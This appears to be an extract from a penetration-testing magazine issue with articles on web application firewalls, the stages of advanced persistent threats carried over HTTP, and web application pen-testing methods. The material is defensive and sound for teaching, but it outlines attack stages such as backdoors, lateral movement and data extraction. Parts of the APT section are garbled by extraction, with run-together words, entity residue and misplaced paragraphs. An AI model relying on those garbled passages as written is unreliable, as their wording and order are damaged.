A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast to classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks the communication at the application level. Normally the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. Analogous to air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which as the first security layer considerably minimizes the risk of attacks on any weak spots.
After introducing a WAF it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused for SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application. If a WAF is also deployed as a protective system, then it can be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis; this would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing web application security.
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes of several web applications. If they are run in redundant mode, they can also perform load-balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAFs filter the data flow between the browser and the web application. If an entry pattern emerges here that is defined as invalid, then the WAF interrupts the data transfer or reacts in another way predefined in the configuration. If, for example, two parameters have been defined for a monitored entry form, then the WAF can block all requests that contain three or more parameters. In this way the length and the contents of parameters can also be checked. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid number of characters and permitted value range.
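The parameter checks described above – count, length and permitted characters – amount to a small rule table per monitored form. A sketch of such a filter (the rule format and names are mine, not any particular WAF's):

```javascript
// A WAF-style positive rule for one monitored form: which
// parameters may exist, how long they may be, and which
// characters they may contain.
const formRules = {
  maxParams: 2,
  params: {
    message: { maxLength: 256, allowed: /^[\w\s.,!?-]*$/ },
    token:   { maxLength: 64,  allowed: /^[0-9a-f]*$/ },
  },
};

function checkRequest(params, rules) {
  const names = Object.keys(params);
  if (names.length > rules.maxParams) return false;   // extra parameters
  for (const name of names) {
    const rule = rules.params[name];
    if (!rule) return false;                          // unknown parameter
    const value = String(params[name]);
    if (value.length > rule.maxLength) return false;  // oversized value
    if (!rule.allowed.test(value)) return false;      // invalid characters
  }
  return true;
}

console.log(checkRequest({ message: 'Hello', token: 'ab12' }, formRules));      // true
console.log(checkRequest({ message: "' OR 1=1 --", token: 'ab12' }, formRules)); // false
```

The second request is rejected because the quote and equals sign fall outside the permitted character class, without the filter needing to know anything about SQL.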
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule set for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks. However, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.
Figure 2. An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can – to a certain extent – automatically prevent malicious code from reaching the browser if, for example, a web application does not conduct sufficient checks of the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. However, in practice a whitelist-only approach is quite cumbersome, requiring constant re-learning if there are any changes to the application. As a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution should rely on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
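The combined approach – generic blacklist signatures everywhere, plus a strict whitelist profile for a high-value page – can be sketched as follows (the URLs and patterns are illustrative only, not from any product):

```javascript
// Blacklist: generic attack signatures applied to every request.
const blacklist = [
  /<script\b/i,        // reflected XSS attempts
  /union\s+select/i,   // classic SQL injection
  /\.\.\//,            // path traversal
];

// Whitelist: strict per-parameter profile, applied only to the
// high-value order-entry page.
const whitelist = {
  '/order': { qty: /^\d{1,3}$/, item: /^[A-Z0-9-]{1,20}$/ },
};

function allowRequest(url, params) {
  const values = Object.values(params).map(String);
  // 1. Blacklist check on every request.
  if (values.some(v => blacklist.some(rx => rx.test(v)))) return false;
  // 2. Whitelist check where a profile exists.
  const profile = whitelist[url];
  if (profile) {
    return Object.entries(params).every(
      ([k, v]) => profile[k] && profile[k].test(String(v)));
  }
  return true; // no profile: blacklist-only coverage
}

console.log(allowRequest('/order', { qty: '2', item: 'SKU-42' }));          // true
console.log(allowRequest('/order', { qty: '1 union select', item: 'A' }));  // false
```

Pages without a profile still get blacklist coverage, so only the few high-value profiles need re-learning when the application changes.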
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that possibly violate the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks – even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in line and uses both of the system's physical ports (WAN and LAN). As a proxy, WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Certain functions are also only available here: as a Full Reverse Proxy a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With proxy WAFs, SSL is much faster and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Level-7 rules (to avoid Denial of Service attacks) as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
own IT infrastructure, is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But the proxy WAFs must also be configured in line with the respective requirements. Penetration tests help with the correct configuration.
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for distributing and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic occur via a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support this?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate tests.
Since by its very nature a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or for the use of the web application; all other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products, or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on the known settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of the PenTest magazine:
If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply asap.
• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War
Available to download on December 22nd.
ADVANCED PERSISTENT THREATS
The omnipresence of the Web is now a given, and it serves a wide variety of situations, as detailed in the non-exhaustive list below:
• Community applications
• Institutional web sites
• Online transactions
• Business applications
• Intranet/Extranet
• Entertainment
• Medical data
• Etc.
In response to user requirements and developing needs, content driven by HTTP has become increasingly rich and dynamic. It even goes as far as incorporating script languages that transform the web browser into a universal enhanced client that espouses different platforms. PC, Mac and mobile users all form part of the connected masses operating on their chosen platforms. But have these new privileges arrived without any underlying constraints?
The race towards sophistication has not been accompanied by similar developments in respect of the security and reliability of data circulated across the Web. A concrete example is the fact that HTTP does not provide native support for sessions, and it is therefore difficult to be sure that requests received during browsing emanate from the same user. Large-scale use of the Web illustrates the discrepancy that exists in terms of security versus volume, and this inherent flaw has become a major IT system issue, making HTTP a preferred vector of attacks and data compromise.
Cybercriminals are aware of the exploitability of the Web and have made it their number one target. Not a week goes by without an organization being compromised via HTTP:
• Playstation Network (Sony) -> WordPress version problem
• MySQL (Oracle) -> SQL Injection
• RSA (EMC) -> SQL Injection
• TJX -> SQL Injection
The above attacks, conceived and carried out with precise attention to logistics, are by no means an innovation, but we now refer to them differently, using the term APT: Advanced Persistent Threat.
Bolstered cyber-activity, the discovery of intrusions, and updated legislation entailing mandatory declaration of incidents collectively lead to extensive media coverage, which in turn amplifies the impact on the image of the unfortunate victims, more often than not high-profile businesses or international organizations.
The Significance Of HTTP And The Web For Advanced Persistent Threats
Initially created in 1989 by Tim Berners-Lee at CERN, the Hypertext Transfer Protocol (HTTP) was actually launched one year later and continues to use specifications that date to 1999 – a mere time lapse of twenty-two years in the transmission of Web-based content.
The use of HTTP may be required because different areas are often filtered out, leaving only the necessary protocols to emerge. HTTP is often left open to allow administrators to navigate through these machines or to update them.
To remain as stealthy as possible, a strategic backdoor to the web application or the application server will use HTTP as a direct connection and/or as a tunnel to other applications. During this movement it will not be filtered, and no attention will be drawn to a process that opens a port unknown to the system.
Bounce Mechanisms
Whenever changes occur within an IT system, the steps involving initial intrusion and continued presence are repeated as many times as necessary until the goal is attained and sensitive data becomes accessible. HTTP once again comes into play during these stages, because it is predominantly active and open between the different areas:
• Dialogue between server applications
• Web Services
• Web administration interfaces
• Etc.
It often happens that security policies contain the same weaknesses from one area to another:
• Exit ports opened
• Filtering omissions on higher-level ports
• Use of the same default passwords
Data ExtractionOnce crucial information is reached it is necessary to quit the system as discreetly as possible and over a certain length of time HTTP protocol is often enabled for exit without being monitored for several reasons
bull Machines are often updated using HTTP bull When an administrator logs on to a remote
machine he will often require access to a website bull Since these areas are often regarded as bdquosaferdquo
zones restrictions are lower and controls less strict
What Protective Measures Can Be DeployedApplication security has become major issue in the business world Whereas network security is fairly conventional and primarily leans on the filtering of destinations sources IP and Ports in most cases application security is more complex and involves applications that are often unique bespoke and
Anatomy of an APTAdvanced Persistent Threats are attacks calculated for latent effect and vested with a specific purpose that of retrieving sensitive or critical data
Several steps are necessary to reach the goal
bull The initial intrusionbull Continued presence within the IT systembull Bounce mechanism and in depth infiltrationbull Data extraction
HTTP plays an important role during the attacks firstly because it is predominantly present during the various stages and furthermore because it is often the only available protocol that can serve as an attack vector
The Initial IntrusionThe system is invaded by an attack focused on an area exposed to the public on the Internet In the case of Sony Playstation Network for instance the intrusion took place via their blog that used a vulnerable version of WordPress
These days it is unusual for any organization to do without a website and the latter can range from basic and simple to complex and dynamic
The website plays the role of a gateway that provides the initial point of entry into an infrastructure It becomes an outpost that enables important information to be gathered in order to successfully carry out the rest of the attack In addition depending on the application infrastructure location and lack of compartmentalization it is possible for a simple scarcely-used application to be found near or on the same server as a business application The attack will bounce from the one to the other and the business application which will then become accessible and provide more access privileges
Retrieval of information is often the vital issue during the bounce mechanism and and extended infiltration intothe system Some examples of the data targeted
bull User Passwords bull Hardware and network destinations -gt discoverybull Connectors to other systems -gt new protocolsbull Etc
Continued presenceAfter the initial inroads into the structure the next phase requires that presence within the system remains secure The machine has to be re-accessed and exploited without arousing the suspicions of system administrators
ADVANCED PERSISTENT THREATS
Page 8 httppentestmagcom012011 (1) November Page 9 httppentestmagcom012011 (1) November
deployed with many more specifications relating to infrastructureThree steps are necessary to prevent or respond properly to an APT
• Prevention
• Response
• Forensics
Prevention
Ideally, security should be addressed at the very beginning, when the software and even the application infrastructure are still at the conception stage. It is necessary to follow certain rules which will condition the response to different threats.
Define a Secure Application Infrastructure
Partition the Network
This measure is one of the pillars of PCI-DSS, and for good reason. Keeping sections separate can limit the impact of an intrusion, making it more difficult to obtain satisfaction because of the large number of bounces required to attain sensitive data. Each zone also deploys a security policy adapted to its content, whether the flow is inbound or outbound.
Moreover, partitioning allows for easier forensic analysis in case of a compromise. It is easier to understand the steps and measure the impact and depth of an attack when one is able to analyze each area separately. Unfortunately, there are many systems described as flat infrastructures that contain a variety of applications housed in the same area. After an incident has occurred, it is difficult to determine precisely which applications have been compromised and what data has been hijacked.
Separation of Applications
Applications can be separated using criteria such as data categorization or the level of risk attached to the application. Clustering provides numerous advantages:
• It promotes rationalization in the design of security policies, which are more or less complex depending on the type of data and the structure of the application to secure.
• It enhances understanding of an attack and, by doing so, facilitates the search for evidence, which will then be based on the criticality of data and the complexity of applications.
Anticipate Possible Outcomes
To better understand the scope of an attack, it is necessary to anticipate the options available to a hacker once an application has been compromised. Once this is done, it is necessary to anticipate the procedures required to analyze, verify and understand the attack. We should bear in mind that an area of the infrastructure in which it is impossible to install a monitoring tool will be very complex to analyze during an incident. In such a case it is necessary to predefine the tools and procedures for investigations and/or monitoring.
Risk Analysis and Attack Guidelines
This step allows a precise understanding of risks based on the data manipulated by applications.
It has to be carried out by studying web applications, their operation and their business logic.
Once each data component has been identified, it is possible to draw up a list of rules and regulations that need to be followed by the application infrastructure.
Developer Training
Applications are commonly developed following specific business imperatives, and often with the added stress of meeting availability deadlines. Developers do not place security high on their list of priorities, and it is often overlooked in the process.
However, there are several ways to significantly reduce risk:
• Raising developer awareness of application attacks:
  • OWASP Top 10
  • WASC TC v2
• The use of libraries to filter input:
  • Libraries are available for all languages
• Setting up audit functions, logs and traceability
• Accurate analysis of how the application works
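The input-filtering point above can be illustrated with a minimal Python sketch (the article does not prescribe a language, and the function names and the username format are assumptions for illustration): an allowlist check on the way in, and output escaping on the way out.

```python
import html
import re

# Allowlist: accept only characters we explicitly expect (assumption:
# usernames are limited to letters, digits, dots and underscores).
USERNAME_RE = re.compile(r"^[A-Za-z0-9._]{1,32}$")

def is_valid_username(value):
    """Reject any input that does not match the allowlist pattern."""
    return bool(USERNAME_RE.match(value))

def render_comment(comment):
    """Escape user-supplied text before echoing it into an HTML page,
    neutralizing script-injection (XSS) attempts."""
    return html.escape(comment)

print(is_valid_username("alice_01"))                  # expected: True
print(is_valid_username("alice'; DROP TABLE users"))  # expected: False
print(render_comment("<script>alert(1)</script>"))
```

An allowlist ("accept only what is known to be good") is generally preferred over a blocklist, since attackers are better at inventing payloads than defenders are at enumerating them.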
Regular Auditing
Code Analysis
You can resort to manual code analysis by an auditor, or to automated analysis using the tools available to find vulnerabilities in the source code of web applications. These tools often require complex configuration. This step is useful to detect vulnerabilities before going into production, and thus to fix them before they are exploited.
Unfortunately, the practice is only possible if you have access to the source code of the application; closed-source software packages cannot be analyzed.
Scanning and Penetration Testing
All applications can be scanned and pentested. These tests also require configuration and/or a thorough analysis of the application to determine the credentials necessary
for navigation, or the resources to be avoided because of their capacity to cause significant damage (e.g. links enabling the deletion of entries in the database).
These tests have to be reproduced as often as possible and whenever a change in the application is put in place by developers
Appropriate Response
Traditional firewalls do not filter application protocols; at best, the so-called next-generation models can recognize a type of protocol and filter content in the manner of an IPS, by recognizing attack patterns. This response is clearly inadequate.
Each zone containing web applications has to be filtered on incoming and outgoing content and on the use of the protocol itself.
This type of deployment is often called defense in depth, and it has the ability to monitor the various attacks at both the application and network levels.
Last but not least, the association of the identity context with the security policy allows better detection of anomalies.
Traffic Filtering: The WAF (Web Application Firewall)
Web application firewalls can be considered an extension of network firewalls to the application level. They are able to analyze HTTP and the content it conveys. The device is strongly recommended by section 6.6 of PCI-DSS.
Often used in reverse proxy mode, it allows for a break in protocol and facilitates the restructuring of areas between applications.
The WAFEC document (Web Application Firewall Evaluation Criteria) published by WASC is a useful guideline that helps to understand and evaluate different vendors as needed
The WAF also helps to monitor and alert in case of threat in order to trigger a rapid response (eg blocking the IP of the attacker via a dialogue protocol with network firewalls)
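The signature-matching side of a WAF can be illustrated with a toy Python sketch. The patterns and function names below are assumptions for illustration only; production rule sets such as the OWASP Core Rule Set are far more extensive and handle evasion techniques this sketch ignores.

```python
import re

# A few illustrative attack signatures (deliberately naive).
SIGNATURES = [
    re.compile(r"(?i)union\s+select"),  # SQL injection probe
    re.compile(r"(?i)<script\b"),       # reflected XSS attempt
    re.compile(r"\.\./"),               # path traversal
]

def inspect_request(path, query):
    """Return the indices of signatures matching the request, so the
    caller can block the request and alert on the offending client."""
    payload = path + "?" + query
    return [i for i, sig in enumerate(SIGNATURES) if sig.search(payload)]

print(inspect_request("/search", "q=shoes"))                    # expected: []
print(inspect_request("/search", "q=1 UNION SELECT password"))  # expected: [0]
```

In a real deployment the match result would feed the alerting and IP-blocking dialogue with network firewalls described above, rather than simply being printed.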
Traffic Filtering: The WSF (Web Services Firewall)
The WSF represents an extension of the WAF to the protocols carrying XML traffic over HTTP, such as SOAP or REST.
XML and its standards make security management easier, in the sense that the operation of the service is described by documents generated directly by the development framework (e.g. WSDL, schemas).
Web services are vulnerable to the same attacks as web applications; they consequently need the same kind of protection. Their position in the application infrastructure, however, is much more critical: they are often located at the heart of sensitive information zones and connected directly via private links to partner infrastructures.
The WSF provides security on the message format and content, but also on the use of a service. The use or production of a web service entails a contract between two parties on the type of use (e.g. number of messages per day, data type, etc.). The WSF will also serve to monitor this function and to ensure respect of the SLA between the two parties.
Authentication / Authorization
Applications use identities to control access to various resources and functions.
The association of the identity context and security increases efficiency in the detection of anomalies. For example, a whitelist adapted according to the type of user can verify access to information based on user role.
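The role-based whitelist idea can be sketched in a few lines of Python; the roles and resource paths below are invented for illustration, not taken from any particular product.

```python
# Map each role to the set of resources it may legitimately reach.
ROLE_WHITELIST = {
    "customer": {"/account", "/orders"},
    "support":  {"/account", "/orders", "/tickets"},
    "admin":    {"/account", "/orders", "/tickets", "/admin"},
}

def is_anomalous(role, resource):
    """Flag any access that falls outside the whitelist for the
    user's role: a candidate event for alerting or blocking."""
    allowed = ROLE_WHITELIST.get(role, set())
    return resource not in allowed

print(is_anomalous("customer", "/admin"))  # expected: True
print(is_anomalous("admin", "/admin"))     # expected: False
```

A customer account suddenly requesting administrative resources is exactly the kind of identity-context anomaly the text describes.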
Ensuring Continuity of Service
Application security is primarily related to the exploitation of vulnerabilities in order to divert normal use for malicious purposes.
However, some attacks based on these weaknesses can be devastating in effect, perpetrated to make the application unavailable and thereby provoke losses due to activity downtime.
To counter them, it is necessary to establish protective measures that block denial of service and automated processes, and to ensure load balancing and SSL acceleration.
Operation
Monitoring
It is important to understand the use of the application during production in order to monitor and detect abnormal behavior and make decisions accordingly:

• Blacklist
• Legal action
• Redirection to a honeypot
Log Correlation
Understanding abnormal behavior in an application helps in locating an attack.
An application infrastructure can comprise hundreds of applications.
To understand the attack as a whole and monitor changes (discovery, aggression, compromise), it is necessary to have a holistic view.
To do this, it is imperative to confront and correlate logs to obtain a real-time overall analysis and understand the threat mechanics:

• Mass attacks on a type of application
• Attacks targeting a specific application
• Attacks focused on a type of data
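Correlating events across many application logs can be sketched as a simple aggregation. The event format below is an assumption for illustration; real deployments feed a SIEM rather than a script.

```python
from collections import Counter

def correlate(events):
    """Group attack events by source IP and by targeted application,
    to distinguish a mass sweep from an attack aimed at one app."""
    by_source = Counter(e["src"] for e in events)
    by_app = Counter(e["app"] for e in events)
    return by_source, by_app

events = [
    {"src": "203.0.113.9",  "app": "blog",  "sig": "sqli"},
    {"src": "203.0.113.9",  "app": "shop",  "sig": "sqli"},
    {"src": "203.0.113.9",  "app": "intra", "sig": "sqli"},
    {"src": "198.51.100.4", "app": "shop",  "sig": "xss"},
]

by_source, by_app = correlate(events)
# One source hitting three different applications suggests a
# coordinated sweep rather than isolated incidents.
print(by_source.most_common(1))
```

Even this trivial grouping makes the holistic view concrete: per-application logs each show one or two events, while the correlated view exposes a single source probing the whole infrastructure.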
Reporting and Alerting
The dialogue between application, network and security teams is often complex within an organization. Formalized reports on attacks and on the use of the application provide these teams with a basis for work and an understanding of application threats.
Alerts will enable them to react and trigger procedures, either at the network level by blocking the IP of the attacker, or at the application level by forbidding access to resources or areas, or more directly by referral to a honeypot with a view to analyzing the behavior of the attacker.
Forensics
Understanding the Scope of an Attack
For each area compromised, it is important to understand what elements have been impacted and to trace the attack to its roots: the intrusion and compromise, the installation of a backdoor, bounce mechanisms to other areas, and/or the extraction of data.
Analysis of Application Components
To understand how the intrusion occurred, it is important to look for abnormal uses. One example could be the presence of anomalous data in a variable or a cookie. To drill down to this level, the logs of the various application components turn out to be very useful:

• Web server or application
• Database
• Directory
• Etc.
Systems Analysis
To understand how the attacker remained in the area, it is important to identify the type of backdoor used. From the simplest act, such as placing an executable file in the application itself, to the injection of code into a process (e.g. hooking network functions), it is necessary to analyze the system hosting the application:

• Changed configuration files
• Users added
• Security rules changed
• Errors of execution or increases in privileges
• Unknown daemons or unusual groups and users
• Etc.
Analysis of Network Equipment
During the various bounces within the application infrastructure, the discovery and exploration of new possibilities leave fingerprints. Network firewalls keep precious logs with traces of these attempts. In addition, if access is logged, it is important to check whether there are connections to web applications at unusual times.
The End Justifies the Means
In conclusion, we can see that the means used to achieve an APT are often substantial and proportional to the criticality of the targeted data. APTs are not just temporary attacks but real and constant threats with latent effect that need to be fought in the long run.
The security of an application infrastructure begins with the conception process and requires basic rules to be respected in order to simplify security operations.
Real-life experience of application management highlights the difficulties in implementing all the good practices.
A comprehensive study of threats, an appropriate response and the anticipation of possible incidents are now the recommended procedure in dealing with application attacks.
MATTHIEU ESTRADE
Matthieu Estrade has 14 years of experience in internet security. In 2001, Matthieu designed a pioneering application firewall based on Web reverse proxy technology for the company Axiliance. As a well-known specialist in his field, he soon became a member of the open source Apache HTTP server development team. His security expertise has been put to contribution in WASC (Web Application Security Consortium) projects like WAFEC and WASSEC. Matthieu is also a member of the French OWASP chapter. Matthieu is currently CTO at BeeWare.
WEB APP SECURITY
Web Application Security and Penetration Testing

In recent years web applications have grown dramatically within many organizations and businesses, which have become very dependent on this technology as part of their business lifecycle.

Dynamic web applications usually use technologies such as ASP, ASP.NET, PHP, Ajax, JSP, Perl, ColdFusion and Flash.
These applications expose financial data, customer information and other sensitive and confidential data that require authentication and authorization. Ensuring that web applications are secure is a critical mission that businesses have to go through to achieve the desired security level of such applications. With the accessibility of such critical data to the public domain, web application security testing also becomes a paramount process for all the web applications that are exposed to the outside world.

Introduction
Penetration testing (also called pen testing) is usually conducted by ethical hackers, where the security team reviews application security vulnerabilities to discover potential security risks. Such a process requires deep knowledge and experience in a variety of different tools and a range of exploits that can achieve the required tasks.
During pen testing, different web application vulnerabilities are tested (e.g. input validation, buffer overflow, cross-site scripting, URL manipulation, SQL injection, cookie modification, bypassing authentication and code execution). A typical pen test involves the following procedures:

• Identification of Ports – In this process ports are scanned and the associated services running are identified.
• Software Services Analyzed – In this process both automated and manual testing is conducted to discover weaknesses.
• Verification of Vulnerabilities – This process helps verify that the vulnerabilities are real, and where a weakness might be exploited, to help remediate the issues.
• Remediation of Vulnerabilities – In this process the vulnerabilities will be resolved and re-tested to ensure they have been addressed.

Part of the initiative of securing web applications is to include the security development lifecycle as part of the software development lifecycle, where the number of security-related design and coding defects can be reduced, and the severity of any defects that do remain undetected can also be reduced or eliminated. Despite the fact that the above initiatives solve some of the security problems, some undiscovered defects will remain even in the most scrutinized web applications. Until scanners can harness true artificial intelligence and put anomalies into context or make normative judgments about them, the struggle to find certain vulnerabilities will remain.
Automated Scanning vs Manual Penetration Testing
A vulnerability assessment simply identifies and reports vulnerabilities, whereas a pen test attempts to exploit vulnerabilities to determine whether unauthorized access or other malicious activities are possible. By performing a pen test to simulate an attack, it is possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration, hardware or software flaws, or weaknesses in the perimeter defences protecting the application.
With more than 75% of attacks occurring over the HTTP/HTTPS protocols, and more than 90% of web applications containing some type of security vulnerability, it is essential that organizations implement strong measures to secure their web applications. Most of these attacks occur at the front door of the organization, where the entire online community has access to these doors (i.e. port 80 and port 443). With the complexity and the tremendous amount of sensitive data that exist within web applications, consumers not only expect but also demand security for this information.
That said, securing a web application goes far beyond testing the application using automated systems and tools or manual processes. The security implementation begins in the conceptual phase, where the security risk introduced by the application is modeled and the required countermeasures are identified. It is imperative that web application security be thought of as another quality vector of every application, one that has to be considered through every step of the application lifecycle.
Discovering web application vulnerabilities can be performed through different processes
bull Automation process ndash where scanning tools or static analysis tools will be used
bull Manual process ndash where penetration testing or code review will be used
Web application vulnerability types can be grouped into two categories:

Technical Vulnerabilities
Such vulnerabilities can be examined through tests for cross-site scripting, injection flaws and buffer overflow. Automated systems and tools which analyze and test web applications are much better equipped to test for technical vulnerabilities than manual penetration tests. While automated testing and scanning tools may not be able
to address 100% of all technical vulnerabilities, there is no reason to believe that such tools will achieve that goal in the near future. Current problems facing web application tools include the following: client-side generated URLs, required JavaScript functions, application logout, transaction-based systems requiring specific user paths, automated form submission, one-time passwords, and infinite web sites with random URL-based session IDs.
Logical Vulnerabilities
Such vulnerabilities can manipulate the logic of the application to do tasks that were never intended to be done. While both an automated scanning tool and a skilled penetration tester can navigate through a web application, only the latter is able to understand the logic behind a specific workflow, or how the application works in general. Understanding the logic and flow of an application allows the manual pen tester to subvert or overthrow the business logic, exposing security vulnerabilities. For instance, an application might direct the user from point A to point B to point C based on the logic flow implemented within the application, where point B represents a security validation check. A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C, bypassing the security validation that exists at point B.
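The point-A-to-point-C bypass described above is, at heart, a missing server-side state check. A hedged sketch of the fix in Python (the step names and session shape are invented for illustration):

```python
# Each step must record that its predecessor was actually completed;
# trusting the client to visit pages in order is the flaw being fixed.
WORKFLOW = ["cart", "security_check", "checkout"]

def advance(session, step):
    """Allow a step only if every earlier step is already done."""
    idx = WORKFLOW.index(step)
    for prereq in WORKFLOW[:idx]:
        if prereq not in session["completed"]:
            raise PermissionError(f"step '{step}' requires '{prereq}' first")
    session["completed"].add(step)

session = {"completed": set()}
advance(session, "cart")
try:
    advance(session, "checkout")   # attacker jumps from A straight to C
except PermissionError as exc:
    print("blocked:", exc)
```

No scanner can know that "checkout" logically requires "security_check"; a human tester spots the missing dependency, which is why this class of flaw is found manually.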
History has proven that software bugs, defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities, which can lead to unauthorized access to systems, networks and application information. It is also proven that most security breaches occur due to vulnerabilities within the web application layer (i.e. attacks using the HTTP/HTTPS protocol). Against such attacks, traditional security mechanisms such as firewalls and IDS provide little or no protection.
Security analyses review the critical components of a web-based portal, e-commerce application or web services platform. Part of the analysis work that can be done is to identify vulnerabilities inherent in the code of the web application itself, regardless of the technology implemented, the back-end database, or the web server used by the application.
It is imperative to point out that web application penetration assessments should be designed based upon a defined threat model. They should also be based upon the evaluation of the integration between components (e.g. third-party components and in-house built components) and the overall deployment configuration, which represents a solid choice for establishing a baseline security assessment. Application penetration assessments serve as a cost-effective mechanism to identify a set of vulnerabilities in a given application, exposing the most likely exploitable vulnerabilities
Figure 1: The different activities of the pen testing process
and allowing similar instances of vulnerabilities to be found throughout the code.
How Web Application Pen Testing Works
Most web application penetration testing is carried out from security operations centers, where access to the resources under test is gained remotely over the Internet using different penetration technologies. At the end of such a test, the application penetration test provides a comprehensive security assessment for various types of applications (e.g. commercial enterprise web applications, internally developed applications, web-based portals and e-commerce applications). Figure 1 describes some of the activities that usually happen during the pen testing process. The testing processes used to achieve the security vulnerability assessment include application spidering, authentication testing, session management testing, data validation testing, web service testing, Ajax testing, business logic testing, risk assessment and reporting.
In conducting web penetration testing, different approaches can be used to achieve the security vulnerability assessment; some of these approaches are:
• Zero-Knowledge Test (Black Box) – In this approach the application security testing team will not have any inside information about the target environment, and the expected knowledge gained will be based on information that can be found in the public domain. This type of test is designed to provide the most realistic penetration test possible, since in many cases attackers start with no real knowledge of the target systems.
• Partial Knowledge Test (Gray Box) – In this approach, partial knowledge of the environment under testing is gained before conducting the test.
